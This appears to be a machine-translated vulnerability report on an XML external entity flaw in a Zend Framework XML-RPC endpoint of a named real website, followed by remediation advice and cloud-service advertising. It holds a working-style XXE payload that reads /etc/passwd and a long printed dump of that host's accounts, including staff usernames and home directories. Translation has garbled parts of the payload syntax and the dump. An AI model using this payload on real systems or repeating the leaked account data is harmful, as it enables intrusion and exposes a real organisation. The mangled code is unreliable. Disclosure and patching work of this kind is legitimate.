URL: http://www.etam.com.cn/api/xmlrpc
Post Data:
<? Xml version = "1.0"?>
<! DOCTYPE foo [
<! ELEMENT methodName ANY>
<! ENTITY xxe SYSTEM "file: // etc/passwd">]>
<MethodCall>
<MethodName> & xxe; </methodName>
</MethodCall>
Vulnerability proof: passwd file content:
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpc: x: 32: 32: Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
Abrt: x: 173: 173:/etc/abrt:/sbin/nologin
Apache: x: 48: 48: Apache:/var/www:/sbin/nologin
Saslauth: x: 499: 76: & quot; Saslauthd user & quot;:/var/empty/saslauth:/sbin/nologin
Postfix: x: 89: 89:/var/spool/postfix:/sbin/nologin
Qpidd: x: 498: 499: Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 65534: 65534: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Tomcat: x: 91: 91: Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
Webalizer: x: 67: 67: Webalizer:/var/www/usage:/sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Tcpdump: x: 72: 72: // sbin/nologin
Oprofile: x: 16: 16: Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
Memcached: x: 497: 496: Memcached daemon:/var/run/memcached:/sbin/nologin
Nginx: x: 496: 495: Nginx web server:/var/lib/nginx:/sbin/nologin
ETapp001: x: 500: 0:/home/ETapp001:/bin/bash
Itochu: x: 501: 501:/var/www/etam/etam.com.cn/itochu:/sbin/nologin
Torry: x: 502: 502:/home/torry:/sbin/nologin
Etamftp: x: 503: 503:/var/www/etam/etam.com.cn/newsletter:/sbin/nologin
Etamftp1: x: 504: 503:/var/www/etam/etam.com.cn/var:/sbin/nologin
Dailycheck: x: 505: 505:/home/dailycheck:/bin/bash
Tom01: x: 506: 506:/home/tom01:/bin/bash
Wangliang01: x: 507: 507:/home/wangliang01:/bin/bash
Hanson01: x: 508: 508:/home/hanson01:/bin/bash
Johny01: x: 509: 509:/home/johny01:/bin/bash
Lilei01: x: 510: 510:/home/lilei01:/bin/bash
William 01: x: 511: 511:/home/William 01:/bin/bash
Ellie01: x: 512: 512:/home/ellie01:/bin/bash
Sam01: x: 513: 513:/home/sam01:/bin/bash
Jack01: x: 514: 514:/home/jack01:/bin/bash
Eric01: x: 515: 515:/home/eric01:/bin/bash
Torry01: x: 516: 516:/home/torry01:/bin/bash
Nagios: x: 517: 517:/home/nagios:/bin/bash
Solution:
1. Check the underlying xml parsing library used. external entity Parsing is prohibited by default;
2. Update the patch:
Versions with vulnerabilities: 1.11.11
1.12.0 RC1
2.0.0 beta4
Earlier versions
Vulnerability fix version: 1.11.12
1.12.0 RC2
2.0.0 beta5
Upgrade based on the corresponding version
Upgrade Address link: http://framework.zend.com/
Http://framework.zend.com/download/latest
Http://packages.zendframework.com/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
